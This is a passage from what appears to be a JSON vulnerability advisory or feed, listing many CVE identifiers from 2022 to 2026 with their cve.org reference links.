"url": "https://www.cve.org/CVERecord?id=CVE-2025-68740"
},
{
"name": "CVE-2025-40158",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40158"
},
{
"name": "CVE-2025-40179",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40179"
},
{
"name": "CVE-2025-68742",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68742"
},
{
"name": "CVE-2025-40282",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40282"
},
{
"name": "CVE-2023-53819",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53819"
},
{
"name": "CVE-2023-54210",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54210"
},
{
"name": "CVE-2025-40053",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40053"
},
{
"name": "CVE-2023-54030",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54030"
},
{
"name": "CVE-2025-68816",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68816"
},
{
"name": "CVE-2025-68192",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68192"
},
{
"name": "CVE-2023-54092",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54092"
},
{
"name": "CVE-2025-68379",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68379"
},
{
"name": "CVE-2023-53997",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53997"
},
{
"name": "CVE-2025-68256",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68256"
},
{
"name": "CVE-2025-68777",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68777"
},
{
"name": "CVE-2025-68254",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68254"
},
{
"name": "CVE-2026-23221",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23221"
},
{
"name": "CVE-2026-23151",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23151"
},
{
"name": "CVE-2025-71145",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71145"
},
{
"name": "CVE-2025-68171",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68171"
},
{
"name": "CVE-2026-23152",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23152"
},
{
"name": "CVE-2025-40301",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40301"
},
{
"name": "CVE-2025-22047",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22047"
},
{
"name": "CVE-2026-22982",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22982"
},
{
"name": "CVE-2023-54224",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54224"
},
{
"name": "CVE-2023-54235",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54235"
},
{
"name": "CVE-2025-71222",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71222"
},
{
"name": "CVE-2025-71118",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71118"
},
{
"name": "CVE-2023-54032",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54032"
},
{
"name": "CVE-2025-68327",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68327"
},
{
"name": "CVE-2023-6040",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6040"
},
{
"name": "CVE-2023-53856",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53856"
},
{
"name": "CVE-2025-40318",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40318"
},
{
"name": "CVE-2025-71229",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71229"
},
{
"name": "CVE-2026-23213",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23213"
},
{
"name": "CVE-2026-23091",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23091"
},
{
"name": "CVE-2025-68241",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68241"
},
{
"name": "CVE-2023-53817",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53817"
},
{
"name": "CVE-2023-53782",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53782"
},
{
"name": "CVE-2023-54115",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54115"
},
{
"name": "CVE-2023-54069",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54069"
},
{
"name": "CVE-2025-71192",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71192"
},
{
"name": "CVE-2023-54104",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54104"
},
{
"name": "CVE-2025-40135",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40135"
},
{
"name": "CVE-2026-23121",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23121"
},
{
"name": "CVE-2023-54027",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54027"
},
{
"name": "CVE-2025-39964",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39964"
},
{
"name": "CVE-2025-68734",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68734"
},
{
"name": "CVE-2025-68776",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68776"
},
{
"name": "CVE-2025-71066",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71066"
},
{
"name": "CVE-2026-22993",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22993"
},
{
"name": "CVE-2025-71236",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71236"
},
{
"name": "CVE-2023-53851",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53851"
},
{
"name": "CVE-2025-68345",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68345"
},
{
"name": "CVE-2025-71097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71097"
},
{
"name": "CVE-2023-54183",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54183"
},
{
"name": "CVE-2023-53841",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53841"
},
{
"name": "CVE-2023-54326",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54326"
},
{
"name": "CVE-2023-54267",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54267"
},
{
"name": "CVE-2023-54282",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54282"
},
{
"name": "CVE-2025-71234",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71234"
},
{
"name": "CVE-2025-40310",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40310"
},
{
"name": "CVE-2022-50697",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50697"
},
{
"name": "CVE-2025-70873",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-70873"
},
{
"name": "CVE-2025-71111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71111"
},
{
"name": "CVE-2026-22985",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22985"
},
{
"name": "CVE-2023-54006",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54006"
},
{
"name": "CVE-2023-53784",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53784"
},
{
"name": "CVE-2023-54067",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54067"
},
{
"name": "CVE-2023-54264",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54264"
},
{
"name": "CVE-2025-71185",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71185"
},
{
"name": "CVE-2025-40331",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40331"
},
{
"name": "CVE-2026-23096",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23096"
},
{
"name": "CVE-2025-68337",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68337"
},
{
"name": "CVE-2025-68351",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68351"
},
{
"name": "CVE-2023-54304",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54304"
},
{
"name": "CVE-2025-38488",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38488"
},
{
"name": "CVE-2025-71131",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71131"
},
{
"name": "CVE-2023-54125",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54125"
},
{
"name": "CVE-2023-54173",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54173"
},
{
"name": "CVE-2023-53743",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53743"
},
{
"name": "CVE-2025-71116",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71116"
},
{
"name": "CVE-2023-53842",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53842"
},
{
"name": "CVE-2025-68208",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68208"
},
{
"name": "CVE-2025-68362",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68362"
},
{
"name": "CVE-2025-71232",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71232"
},
{
"name": "CVE-2023-53762",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53762"
},
{
"name": "CVE-2025-68290",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68290"
},
{
"name": "CVE-2025-40280",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40280"
},
{
"name": "CVE-2025-40099",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40099"
},
{
"name": "CVE-2025-71162",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71162"
},
{
"name": "CVE-2025-40293",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40293"
},
{
"name": "CVE-2025-68750",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68750"
},
{
"name": "CVE-2023-54127",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54127"
},
{
"name": "CVE-2023-53861",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53861"
},
{
"name": "CVE-2025-68803",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68803"
},
{
"name": "CVE-2026-22996",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22996"
},
{
"name": "CVE-2025-68331",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68331"
},
{
"name": "CVE-2023-54137",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54137"
},
{
"name": "CVE-2026-23105",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23105"
},
{
"name": "CVE-2026-22976",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22976"
},
{
"name": "CVE-2023-54319",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54319"
},
{
"name": "CVE-2025-68305",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68305"
},
{
"name": "CVE-2025-40320",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40320"
},
{
"name": "CVE-2026-23141",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23141"
},
{
"name": "CVE-2026-23065",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23065"
},
{
"name": "CVE-2025-68753",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68753"
},
{
"name": "CVE-2023-54140",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54140"
},
{
"name": "CVE-2025-68775",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68775"
},
{
"name": "CVE-2026-23182",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23182"
},
{
"name": "CVE-2025-71112",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71112"
},
{
"name": "CVE-2023-54285",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54285"
},
{
"name": "CVE-2026-23086",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23086"
},
{
"name": "CVE-2023-54025",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54025"
},
{
"name": "CVE-2025-40192",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40192"
},
{
"name": "CVE-2023-54229",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54229"
},
{
"name": "CVE-2025-68818",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68818"
},
{
"name": "CVE-2023-54300",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54300"
},
{
"name": "CVE-2025-39880",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39880"
},
{
"name": "CVE-2023-54042",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54042"
},
{
"name": "CVE-2023-53807",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53807"
},
{
"name": "CVE-2025-40102",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40102"
},
{
"name": "CVE-2023-54302",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54302"
},
{
"name": "CVE-2025-40170",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40170"
},
{
"name": "CVE-2025-40160",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40160"
},
{
"name": "CVE-2025-40284",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40284"
},
{
"name": "CVE-2023-54178",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54178"
},
{
"name": "CVE-2023-54051",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54051"
},
{
"name": "CVE-2023-53808",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53808"
},
{
"name": "CVE-2025-71148",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71148"
},
{
"name": "CVE-2025-68366",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68366"
},
{
"name": "CVE-2024-53070",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53070"
},
{
"name": "CVE-2023-54008",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54008"
},
{
"name": "CVE-2026-23156",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23156"
},
{
"name": "CVE-2023-54014",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54014"
},
{
"name": "CVE-2025-68815",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68815"
},
{
"name": "CVE-2025-40215",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40215"
},
{
"name": "CVE-2025-40307",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40307"
},
{
"name": "CVE-2026-23095",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23095"
},
{
"name": "CVE-2025-68346",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68346"
},
{
"name": "CVE-2025-71163",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71163"
},
{
"name": "CVE-2025-40211",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40211"
},
{
"name": "CVE-2026-23062",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23062"
},
{
"name": "CVE-2025-40042",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40042"
},
{
"name": "CVE-2023-54258",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54258"
},
{
"name": "CVE-2025-39890",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39890"
},
{
"name": "CVE-2025-71096",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71096"
},
{
"name": "CVE-2025-71095",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71095"
},
{
"name": "CVE-2023-54221",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54221"
},
{
"name": "CVE-2025-68771",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68771"
},
{
"name": "CVE-2025-68363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68363"
},
{
"name": "CVE-2025-40248",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40248"
},
{
"name": "CVE-2025-39748",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39748"
},
{
"name": "CVE-2026-22984",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22984"
},
{
"name": "CVE-2025-68303",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68303"
},
{
"name": "CVE-2025-40259",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40259"
},
{
"name": "CVE-2023-53827",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53827"
},
{
"name": "CVE-2025-68757",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68757"
},
{
"name": "CVE-2023-54293",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54293"
},
{
"name": "CVE-2025-40329",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40329"
},
{
"name": "CVE-2026-23070",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23070"
},
{
"name": "CVE-2026-23033",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23033"
},
{
"name": "CVE-2026-22977",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22977"
},
{
"name": "CVE-2026-23145",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23145"
},
{
"name": "CVE-2022-50423",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50423"
},
{
"name": "CVE-2023-54060",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54060"
},
{
"name": "CVE-2026-23104",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23104"
},
{
"name": "CVE-2026-23003",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23003"
},
{
"name": "CVE-2025-68766",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68766"
},
{
"name": "CVE-2023-53778",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53778"
},
{
"name": "CVE-2025-39817",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39817"
},
{
"name": "CVE-2026-23076",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23076"
},
{
"name": "CVE-2023-54145",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54145"
},
{
"name": "CVE-2023-54171",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54171"
},
{
"name": "CVE-2023-54240",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54240"
},
{
"name": "CVE-2025-68168",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68168"
},
{
"name": "CVE-2025-71123",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71123"
},
{
"name": "CVE-2025-68206",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68206"
},
{
"name": "CVE-2023-54247",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54247"
},
{
"name": "CVE-2024-38542",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38542"
},
{
"name": "CVE-2025-71100",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71100"
},
{
"name": "CVE-2025-68372",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68372"
},
{
"name": "CVE-2026-23171",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23171"
},
{
"name": "CVE-2023-54070",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54070"
},
{
"name": "CVE-2023-54204",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54204"
},
{
"name": "CVE-2026-23010",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23010"
},
{
"name": "CVE-2026-23112",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23112"
},
{
"name": "CVE-2025-68313",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68313"
},
{
"name": "CVE-2023-53850",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53850"
},
{
"name": "CVE-2023-54303",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54303"
},
{
"name": "CVE-2025-71137",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71137"
},
{
"name": "CVE-2026-23084",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23084"
},
{
"name": "CVE-2026-23190",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23190"
},
{
"name": "CVE-2025-40123",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40123"
},
{
"name": "CVE-2026-22979",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22979"
},
{
"name": "CVE-2023-53998",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53998"
},
{
"name": "CVE-2025-68301",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68301"
},
{
"name": "CVE-2026-23011",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23011"
},
{
"name": "CVE-2023-53816",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53816"
},
{
"name": "CVE-2025-40297",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40297"
},
{
"name": "CVE-2025-68217",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68217"
},
{
"name": "CVE-2025-40178",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40178"
},
{
"name": "CVE-2025-68289",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68289"
},
{
"name": "CVE-2025-40363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40363"
},
{
"name": "CVE-2023-53852",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53852"
},
{
"name": "CVE-2025-40253",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40253"
},
{
"name": "CVE-2026-22988",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22988"
},
{
"name": "CVE-2025-68245",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68245"
},
{
"name": "CVE-2025-40317",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40317"
},
{
"name": "CVE-2026-23110",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23110"
},
{
"name": "CVE-2023-54135",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54135"
},
{
"name": "CVE-2023-53996",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53996"
},
{
"name": "CVE-2025-68233",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68233"
},
{
"name": "CVE-2025-71120",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71120"
},
{
"name": "CVE-2024-26944",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26944"
},
{
"name": "CVE-2026-23060",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23060"
},
{
"name": "CVE-2025-38321",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38321"
},
{
"name": "CVE-2025-40316",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40316"
},
{
"name": "CVE-2025-71119",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71119"
},
{
"name": "CVE-2023-54314",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54314"
},
{
"name": "CVE-2025-71197",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71197"
},
{
"name": "CVE-2025-68758",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68758"
},
{
"name": "CVE-2025-38539",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38539"
},
{
"name": "CVE-2025-71113",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71113"
},
{
"name": "CVE-2023-54292",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54292"
},
{
"name": "CVE-2026-23102",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23102"
},
{
"name": "CVE-2026-22998",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22998"
},
{
"name": "CVE-2023-54172",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54172"
},
{
"name": "CVE-2023-54113",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54113"
},
{
"name": "CVE-2025-68340",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68340"
},
{
"name": "CVE-2026-23082",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23082"
},
{
"name": "CVE-2023-53836",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53836"
},
{
"name": "CVE-2026-23155",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23155"
},
{
"name": "CVE-2025-40288",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40288"
},
{
"name": "CVE-2025-68239",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68239"
},
{
"name": "CVE-2025-40258",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40258"
},
{
"name": "CVE-2023-53857",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53857"
},
{
"name": "CVE-2023-53860",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53860"
},
{
"name": "CVE-2025-68185",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68185"
},
{
"name": "CVE-2025-40304",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40304"
},
{
"name": "CVE-2023-54169",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54169"
},
{
"name": "CVE-2025-40268",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40268"
},
{
"name": "CVE-2026-23111",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23111"
},
{
"name": "CVE-2023-54281",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54281"
},
{
"name": "CVE-2026-23113",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23113"
},
{
"name": "CVE-2025-71231",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71231"
},
{
"name": "CVE-2023-54080",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54080"
},
{
"name": "CVE-2025-68798",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68798"
},
{
"name": "CVE-2023-53794",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53794"
},
{
"name": "CVE-2026-23157",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23157"
},
{
"name": "CVE-2025-68810",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68810"
},
{
"name": "CVE-2025-68178",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68178"
},
{
"name": "CVE-2025-40337",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40337"
},
{
"name": "CVE-2025-40346",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40346"
},
{
"name": "CVE-2025-40262",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40262"
},
{
"name": "CVE-2025-39813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39813"
},
{
"name": "CVE-2025-71198",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71198"
},
{
"name": "CVE-2025-68819",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68819"
},
{
"name": "CVE-2023-54022",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54022"
},
{
"name": "CVE-2025-40261",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40261"
},
{
"name": "CVE-2023-54296",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54296"
},
{
"name": "CVE-2025-40244",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40244"
},
{
"name": "CVE-2025-68735",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68735"
},
{
"name": "CVE-2026-23021",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23021"
},
{
"name": "CVE-2025-68732",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68732"
},
{
"name": "CVE-2025-40323",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40323"
},
{
"name": "CVE-2025-68285",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68285"
},
{
"name": "CVE-2023-54220",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54220"
},
{
"name": "CVE-2025-71183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71183"
},
{
"name": "CVE-2023-54209",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54209"
},
{
"name": "CVE-2025-40275",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40275"
},
{
"name": "CVE-2023-54019",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54019"
},
{
"name": "CVE-2026-25702",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25702"
},
{
"name": "CVE-2025-39829",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39829"
},
{
"name": "CVE-2025-71091",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71091"
},
{
"name": "CVE-2026-23053",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23053"
},
{
"name": "CVE-2023-54189",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54189"
},
{
"name": "CVE-2025-71184",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71184"
},
{
"name": "CVE-2025-68227",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68227"
},
{
"name": "CVE-2025-40339",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40339"
},
{
"name": "CVE-2025-40223",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40223"
},
{
"name": "CVE-2023-54230",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54230"
},
{
"name": "CVE-2023-53831",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53831"
},
{
"name": "CVE-2025-68800",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68800"
},
{
"name": "CVE-2025-68195",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68195"
},
{
"name": "CVE-2025-68261",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68261"
},
{
"name": "CVE-2023-54299",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54299"
},
{
"name": "CVE-2023-53768",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53768"
},
{
"name": "CVE-2025-71149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71149"
},
{
"name": "CVE-2023-54099",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54099"
},
{
"name": "CVE-2025-40319",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40319"
},
{
"name": "CVE-2023-54219",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54219"
},
{
"name": "CVE-2025-68727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68727"
},
{
"name": "CVE-2023-53847",
